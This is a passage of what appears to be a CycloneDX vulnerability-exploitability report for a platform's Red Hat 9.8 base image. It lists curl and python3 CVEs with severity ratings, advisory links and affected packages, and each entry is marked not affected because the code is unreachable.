          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14017",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14017"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14017"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:35:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14524",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        601
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14524"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg"
        },
        {
          "url": "https://hackerone.com/reports/3459417"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-06-17T08:36:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15079",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        297
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15079"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15079"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q"
        },
        {
          "url": "https://hackerone.com/reports/3477116"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
